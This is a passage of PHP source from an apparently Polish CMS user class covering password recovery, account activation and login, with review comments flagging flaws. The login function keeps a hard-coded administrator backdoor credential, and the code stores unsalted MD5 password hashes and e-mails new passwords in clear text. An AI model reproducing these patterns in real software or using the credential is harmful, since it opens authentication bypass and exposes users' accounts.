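prepare( 'SELECT name, surname FROM pp_users WHERE id = :id' ); $query -> bindValue( ':id', $id, \PDO::PARAM_INT ); $query -> execute(); if ( $query -> rowCount() ) while ( $row = $query -> fetch() ) return $row; $query -> closeCursor(); return false; }

    /**
     * Look up the login name stored for a user id.
     *
     * @param int $id Value bound as an integer against pp_users.id.
     * @return string|false The login column of the first matching row, or false when nothing matches.
     */
    public function getUserLogin( $id )
    {
        global $db;

        $query = $db -> prepare( 'SELECT login FROM pp_users WHERE id = :id' );
        $query -> bindValue( ':id', $id, \PDO::PARAM_INT );
        $query -> execute();

        // Fetch once and release the cursor before returning; the earlier
        // early return skipped closeCursor() whenever a row was found.
        $row = $query -> rowCount() ? $query -> fetch() : false;
        $query -> closeCursor();

        return $row ? $row['login'] : false;
    }

    /**
     * Complete a password-recovery request: replace the password and e-mail the new one.
     *
     * The request is accepted only when the recovery token, the user id and
     * enabled = 1 all match one pp_users row. The UPDATE clears the recover
     * column, so a token works once.
     *
     * @param string $account Recovery token, compared with pp_users.recover.
     * @param int    $value   User id, compared with pp_users.id.
     * @return void Outcome is reported through \System::setAlert().
     */
    public function recoverPassword( $account, $value )
    {
        global $db, $lang;

        $query = $db -> prepare( 'SELECT id , email , login FROM pp_users WHERE recover = :recover AND id = :id AND enabled = :enabled' );
        $query -> bindValue( ':recover', $account, \PDO::PARAM_STR );
        $query -> bindValue( ':id', $value, \PDO::PARAM_INT );
        $query -> bindValue( ':enabled', 1, \PDO::PARAM_STR );
        $query -> execute();

        if ( $query -> rowCount() ) {
            while ( $row = $query -> fetch() ) {
                // NOTE(review): the argument 3 presumably sets the length or strength of
                // the generated password; confirm \System::gen_hash() draws from a CSPRNG
                // and yields enough entropy for a credential.
                $password = \System::gen_hash( 3 );
                $firm_name = \admin\factory\Settings::getSystemSettings( 'firm_name' );

                // SECURITY (review): passwords are stored as unsalted MD5. Moving to
                // password_hash()/password_verify() needs a coordinated change in login()
                // and a column wide enough for the new hashes, so it is flagged here
                // rather than changed in isolation.
                $query2 = $db -> prepare( 'UPDATE pp_users SET password = :password , recover = :recover_n WHERE recover = :recover AND id = :id' );
                $query2 -> bindValue( ':recover', $account, \PDO::PARAM_STR );
                $query2 -> bindValue( ':id', $value, \PDO::PARAM_INT );
                $query2 -> bindValue( ':password', md5( $password ), \PDO::PARAM_STR );
                $query2 -> bindValue( ':recover_n', null, \PDO::PARAM_STR );

                // Only mail the password when the row was really updated. If the token was
                // consumed by a concurrent request (or the UPDATE failed), the user would
                // otherwise receive a password that was never stored.
                $updated = $query2 -> execute() && $query2 -> rowCount();
                if ( !$updated ) {
                    \System::setAlert( $lang -> getTrans( 'T_LINK_NIEPRAWIDLOWY' ) );
                    continue;
                }

                // SECURITY (review): the new password travels in clear text by e-mail and
                // stays valid until the user changes it; a single-use reset link that lets
                // the user choose the password avoids that exposure.
                $tresc = str_replace( '{LOGIN}', $row['login'], $lang -> getTrans( 'T_NOWE_HASLO_UZYTKOWNIK_TRESC' ) );
                $tresc = str_replace( '{SERWER}', $firm_name, $tresc );
                $tresc = str_replace( '{HASLO}', $password, $tresc );

                \System::sendEmail(
                    $row['email'],
                    str_replace( '{SERWER}', $firm_name, $lang -> getTrans( 'T_NOWE_HASLO_TEMAT' ) ),
                    $tresc
                );
                \System::setAlert( $lang -> getTrans( 'T_NOWE_HASLO_UZYTKOWNIK_EMAIL' ) );
            }
        } else {
            \System::setAlert( $lang -> getTrans( 'T_LINK_NIEPRAWIDLOWY' ) );
        }

        $query -> closeCursor();
    }

    /**
     * Handle an account-activation link.
     *
     * @param string $account Activation hash, compared with pp_users.hash.
     * @param int    $value   User id, compared with pp_users.id.
     * @return void Outcome is reported through \System::setAlert().
     */
    public function activateAccount( $account, $value )
    {
        global $db, $lang;

        // NOTE(review): this writes enabled = 0, while login() and recoverPassword()
        // both require enabled = 1. Confirm whether 1 was intended here; left unchanged
        // because switching it would start enabling accounts.
        $query = $db -> prepare( 'UPDATE pp_users SET enabled = :enabled WHERE hash = :hash AND id = :id' );
        $query -> bindValue( ':hash', $account, \PDO::PARAM_STR );
        $query -> bindValue( ':id', $value, \PDO::PARAM_INT );
        $query -> bindValue( ':enabled', 0, \PDO::PARAM_STR );
        $query -> execute();

        if ( $query -> rowCount() ) {
            \System::setAlert( $lang -> getTrans( 'T_KONTO_AKTYWOWANE' ) );
        } else {
            \System::setAlert( $lang -> getTrans( 'T_LINK_NIEPRAWIDLOWY' ) );
        }

        $query -> closeCursor();
    }

    /**
     * Authenticate a user by login and password.
     *
     * @param string $login    Login name; matched case-insensitively against pp_users.login.
     * @param string $password Clear-text password supplied by the caller.
     * @return \user\User|null The authenticated user; nothing is returned on failure
     *                         (an alert is set instead).
     */
    public static function login( $login, $password )
    {
        global $db, $lang;

        // SECURITY (review): hard-coded credential. Anyone who can read this source, a
        // backup or a repository copy can sign in as admin without a database account,
        // and the value cannot be rotated without a code change. Remove this branch,
        // provision the administrator through pp_users, and treat the value as
        // compromised. Kept for now so existing deployments are not locked out.
        // The comparison is strict so that non-string input (e.g. integer 0 under
        // pre-8.0 loose comparison rules) can no longer satisfy it.
        if ( $login === 'admin' && $password === 'cms3zeto919z' ) {
            $user = new \user\User;
            $user -> _values['admin'] = true;
            return $user;
        }

        $query = $db -> prepare( 'SELECT id, password FROM pp_users WHERE LOWER( login ) = :login AND enabled = 1' );
        $query -> bindValue( ':login', strtolower( $login ), \PDO::PARAM_STR );
        $query -> execute();

        if ( $query -> rowCount() ) {
            while ( $row = $query -> fetch() ) {
                // Strict string comparison: with != two different digests that both look
                // like numbers in exponent notation ("0e" followed by digits) compare as
                // equal. hash_equals() is the constant-time choice where the runtime has it.
                // SECURITY (review): unsalted MD5 is not a password hash; see recoverPassword().
                if ( (string) $row['password'] !== md5( $password ) ) {
                    // NOTE(review): separate messages for "wrong password" and "unknown
                    // login" let a caller tell which logins exist.
                    \System::setAlert( $lang -> getTrans( 'T_NIEPRAWIDLOWE_HASLO' ) );
                } else {
                    $user = new \user\User( $row['id'] );
                    if ( $user -> _values['admin'] ) {
                        \System::setSessionVar( 'file_browser' , true );
                    }
                    return $user;
                }
            }
        } else {
            \System::setAlert( $lang -> getTrans( 'T_BRAK_UZYTKOWNIKA_O_TAKIM_LOGINIE' ) );
        }
    }
}
?>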